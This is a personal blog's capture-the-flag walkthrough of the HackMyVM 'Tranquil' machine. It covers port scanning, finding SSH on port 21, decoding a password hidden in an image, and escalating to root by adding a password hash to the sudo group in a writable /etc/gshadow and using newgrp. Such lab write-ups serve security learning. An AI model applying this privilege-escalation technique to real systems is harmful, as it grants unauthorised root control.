Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Tranquil Walkthrough

HackMyVm  Tranquil Walkthrough

Key points: multi service on one port, gshadow.

Scan ports, only 21 is open, and anonymous login, very strange.

 nmap -sV -sC -p- -oN ports.log
 Nmap scan report for deathnote.vuln (
 Host is up (0.00076s latency).
 Not shown: 65534 closed ports
 21/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 |_ftp-bounce: ERROR: Script execution failed (use -d to debug)
 | ssh-hostkey:
 |   3072 0e:03:3b:78:00:29:1d:ba:60:86:0e:d3:bb:7e:3c:04 (RSA)
 |   256 2a:47:4d:9c:ce:07:61:ca:f0:ca:58:8b:5b:0f:d4:db (ECDSA)
 |_  256 6c:42:50:a5:60:e9:0f:37:0f:be:ec:d1:20:74:29:9c (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check port 21 with curl.

 ~ curl                                                                                                         fish-0 | 0 [14:06:46]
 <img src="tranquil.jpg">
 <!-- We are one, humans, computers and ports.
 - guru -->

Gobuster enum files and folders, but found nothing.

Download tranquil.jpg, found strange coding on left side.

Google "color squares coding", decode it at site: Then we get a string.

When use nc to check port 21, we can see OpenSSH is running on this port.

 ~ nc 21                                                                                                                   fish-0 | 0 [14:14:14]
 SSH-2.0-OpenSSH_8.4p1 Debian-5
 Invalid SSH identification string.

Login with username guru and password we get.

 ~ ssh guru@ -p 21                                                                                                        fish-0 | 130 [14:12:56]
 The authenticity of host '[]:21 ([]:21)' can't be established.               ...

Found files writable.

 guru@tranquil:~$ find / -writable -not -path "/proc*" 2>/dev/null

Generate a password hash

 guru@tranquil:~$ openssl passwd mypass

Add the password hash to sudo group in gshadow.

 guru@tranquil:~$ cat /etc/gshadow  
 root:*::                                                                                                 ...

Use newgrp to change group of user guru, enter the passwd. Check sudo again.

 guru@tranquil:~$ newgrp sudo
 guru@tranquil:~$ sudo -l
 [sudo] password for guru:
 Matching Defaults entries for guru on tranquil:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User guru may run the following commands on tranquil:
     (ALL : ALL) ALL                    

Then we can be root.

 guru@tranquil:~$ sudo su
 root@tranquil:/home/guru# id;hostname
 uid=0(root) gid=0(root) groups=0(root)



Powered By Z-BlogPHP 1.7.1